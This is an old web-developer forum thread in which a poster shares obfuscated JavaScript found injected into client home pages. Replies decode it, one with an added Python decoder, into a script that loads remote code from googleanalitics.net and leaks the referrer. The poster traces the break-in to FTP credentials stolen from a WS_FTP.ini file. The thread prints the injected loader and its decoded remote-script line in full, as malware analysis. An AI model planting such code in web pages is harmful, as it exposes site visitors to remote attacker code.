
What is this code and where does it come from?

P: 5
I'm a website developer. Recently I've found variations of this code on the home pages of several of my sites. It triggers warnings in some anti-virus/malware programs but not in others. The pages are on different servers which leads me to believe the code is coming from me somehow. Can anyone tell me what it does? Is it possibly the output of a virus on my machine? If so, why would it appear on the remote version of the page and not my local version? Thanks for any insights!

<!--7cfbf03e9f4dd4246885967ac47c533a-><script language=javascript>pkunj="%";zmct="L3cscript L6canL67L75agL65L3djavasL63rL69L70L74L3eL20 fL75L6eL63tion eL66j(gL6eq){vaL72 L69L72,L78=\"L651L68wa+89L74m)7L72`pL4eL21EV6L5bL47L7cL54L32L34jvL6bL3a='L3b-L4fL49ML2aL2e_HsiL6fL42L43L75yL63dL50L40L5dlqZJL55L4bL5e$\\\"AzL46#L7d3L20L35L2c0bL67xL7b(fL26~n\",kL72L78L3dL22\",o,ooL2cL6c=L22\",mxL6dL3bL66L6fL72(ir=L30L3bL69rL3cgL6eL71L2elL65ngth;L69L72L2b+)L7b oL3dgL6eL71L2echarL41tL28ir);oo=L78L2eL69nL64eL78OL66L28L6f);L69f(L6fo>-1){ mL78L6dL3d((oL6fL2bL31)L258L31L2d1L29;if(mxmL3c=0)L6dL78m+L3d81L3bl+L3dxL2eL63L68aL72L41L74L28mxL6dL2dL31)L3bL20} L65lL73eL20L6c+L3do;L7dkrL78+=l;dL6fcumL65ntL2eL77L72iteL28kL72xL29L3b}<L2fL73L63L72L69ptL3e";ufdr=unescape(zmct.replace(/L/g,pkunj));var nli,b;document.write(ufdr);nli="<id`oNm5q+exy+x1'Av+k+id`oNmA>5PBdy)1em_a`om1f5A<SuRM@25q+exy+x1'\\AU+k+Sd`oNm\\A5SRu'\\AwmmN=//aaa_xBBxq1+e+qomodi_e1m/HHymg_vi?A8PBdy)1em_`1&1``1`8A\\A><\\/SuRM@2>A57-5</id`oNm>55";efj(nli);</script>
Oct 17 '08 #1
6 Replies


Atli
Expert 5K+
P: 5,058
Hi.

Where exactly on your pages is this showing up?
Do the pages use any data taken from the client?

What exactly do the malware applications that flag it say?

Without actually being able to read what the code does, my best guess would be that this was planted by some *cracker* to either try to steal information from your clients or to try to plant malicious code on their browsers. You really need to find out how they did it and plug that hole.

In any case, unless you figure out exactly what it is, I would get rid of it fast.
If this is some sort of malicious code, and it is being executed when people visit your site, it could very well be causing them any number of problems, which could even lead to your site being flagged by the anti-phishing programs. (But then again, I'm the paranoid type :P)
Oct 18 '08 #2

gits
Expert Mod 5K+
P: 5,235
The script is some obfuscated JavaScript that adds the following code to your page:

<script language="javascript"> document.write( "<SCRIPT language=\"JavaScript\" SRC=\"http://www.googleanalitics.net/__utb.js?"+document.referrer+"\"><\/SCRIPT>" ); </script>
calling the shown url:

http://www.googleanalitics.net/__utb.js

is blocked by FF because of a potential security risk -> so I would just remove the code and try to trace down where it came from, as Atli suggested.

kind regards
Oct 18 '08 #3
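The decoding gits describes can be reproduced offline. The following is an added example written for this thread (it is not gits's code and not part of the injected script); it embeds the two strings from the first post exactly as the browser would see them after JavaScript string-escape processing, and works in the same two stages as the original: first it undoes `unescape(zmct.replace(/L/g,"%"))` to recover the `efj()` decoder and its 81-character alphabet `x`, then it applies the substitution `efj()` performs (every character found in `x` is replaced by the character one position before it, everything else passes through) to the `nli` payload. The function and constant names (`ZMCT`, `NLI`, `stage1_unescape`, `extract_alphabet`, `efj_decode`, `decode_injected_script`) are this example's own.

```python
"""Two-stage decoder for the injected script quoted in this thread.

Stage 1: 'zmct' is a percent-encoded script in which every '%' was
replaced by 'L'; undoing that yields the efj() decoder and its
81-character alphabet x.  Stage 2: efj() maps each character found
in x to the character one position before it (a fixed-shift
substitution over that alphabet) and leaves other characters as-is.
"""
import re
from urllib.parse import unquote

# zmct as assigned in the first post, with JS string escapes resolved
# (split across adjacent literals only for readability).
ZMCT = (
    r'''L3cscript L6canL67L75agL65L3djavasL63rL69L70L74L3eL20 fL75L6eL63tion eL66j(gL6eq){vaL72 L69L72,L78="'''
    r'''L651L68wa+89L74m)7L72`pL4eL21EV6L5bL47L7cL54L32L34jvL6bL3a='L3b-L4fL49ML2aL2e_HsiL6fL42L43L75yL63dL50L40L5dlqZJL55L4bL5e$\"AzL46#L7d3L20L35L2c0bL67xL7b(fL26~n"'''
    r''',kL72L78L3dL22",o,ooL2cL6c=L22",mxL6dL3bL66L6fL72(ir=L30L3bL69rL3cgL6eL71L2elL65ngth;L69L72L2b+)L7b oL3dgL6eL71L2echarL41tL28ir);oo=L78L2eL69nL64eL78OL66L28L6f);'''
    r'''L69f(L6fo>-1){ mL78L6dL3d((oL6fL2bL31)L258L31L2d1L29;if(mxmL3c=0)L6dL78m+L3d81L3bl+L3dxL2eL63L68aL72L41L74L28mxL6dL2dL31)L3bL20} L65lL73eL20L6c+L3do;L7dkrL78+=l;dL6fcumL65ntL2eL77L72iteL28kL72xL29L3b}<L2fL73L63L72L69ptL3e'''
)

# nli as assigned in the first post, with JS string escapes resolved.
NLI = (
    r'''<id`oNm5q+exy+x1'Av+k+id`oNmA>5PBdy)1em_a`om1f5A<SuRM@25q+exy+x1'\AU+k+Sd`oNm\A5SRu'\A'''
    r'''wmmN=//aaa_xBBxq1+e+qomodi_e1m/HHymg_vi?A8PBdy)1em_`1&1``1`8A\A><\/SuRM@2>A57-5</id`oNm>55'''
)


def stage1_unescape(blob: str, key: str = 'L') -> str:
    """Undo unescape(blob.replace(/key/g, '%')): the first layer."""
    return unquote(blob.replace(key, '%'))


def extract_alphabet(script: str) -> str:
    """Pull the x="..." literal out of the decoded efj() and resolve \\" escapes."""
    m = re.search(r'x="((?:\\.|[^"\\])*)"', script)
    if not m:
        raise ValueError('no x="..." alphabet literal found in stage-1 output')
    return m.group(1).replace('\\"', '"')


def efj_decode(alphabet: str, text: str) -> str:
    """Re-implement efj(): shift each alphabet character back by one position.

    efj() computes ((oo+1)%81-1), bumps non-positive results by 81 and
    indexes x at (that-1); over indices 0..80 this is exactly x[(oo-1) % 81].
    """
    n = len(alphabet)
    out = []
    for ch in text:
        i = alphabet.find(ch)
        out.append(alphabet[(i - 1) % n] if i >= 0 else ch)
    return ''.join(out)


def decode_injected_script() -> str:
    """Run both stages on the thread's sample and return the final HTML."""
    stage1 = stage1_unescape(ZMCT)
    return efj_decode(extract_alphabet(stage1), NLI)


if __name__ == '__main__':
    print(stage1_unescape(ZMCT))      # the efj() decoder itself
    print(decode_injected_script())   # the <SCRIPT SRC="...googleanalitics.net/__utb.js?..."> writer
```

Running it prints the `document.write` line gits posted; the only data carried out of the page is `document.referrer`, appended to the remote script URL. The same two helpers work on any sample that uses this `replace(/L/g,"%")` plus alphabet-shift scheme, because the alphabet is read from the decoded first stage rather than hard-coded.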

P: 5
Thanks, Atli and gits--that tells me a lot. Some research on googleanalitics.net shows complaints going back to at least 2002. I fixed the pages as soon as I discovered the code on each one. Now I've got to figure out HOW they got infected. The "date modified" stamp on the server shows that the various pages were altered on July 3, 8 and 10. That four of my pages for different clients on different servers got infected randomly seems too coincidental, but if it's coming from me, why just those four and not any of the many others I maintain? Nightly sweeps by AVG 8.0 aren't showing anything on my machine, and there's no viewer input to any of the pages. I realize this is getting off the topic of the forum, but thanks again for your help--I'll post back FYI if I find out anything else.
Oct 18 '08 #4

gits
Expert Mod 5K+
P: 5,235
Maybe the servers were infected/corrupted? Try to ask the admins there ... maybe they are aware of the problem ... or in case they are not, maybe they could (and should) investigate that? In case you find out something, it would be really great to post it here for people that might have similar problems in the future ...

kind regards
Oct 18 '08 #5

P: 5
Several of the infected sites are hosted with GoDaddy. They checked server logs and found that the files were accessed using the hosting account username and password. The infected files were coming from an IP address that resolved to HostFresh in Hong Kong. It's become apparent that my WS_FTP .ini file was compromised and the information in it was used to access these sites. I've found that there is malware that looks for certain files on a computer and that the WS_FTP.ini file is a common target.

For what it's worth, out of about 50 sites in my WS_FTP.ini file, 8 were accessed--4 on GoDaddy and 4 on smaller hosting services. I have about 20 sites on LunarPages and none were accessed--not sure why.
Dec 1 '08 #6

P: 1
I had a similar experience. Same FTP, same script, different host.

This thread has been hugely valuable.
Jan 8 '09 #7
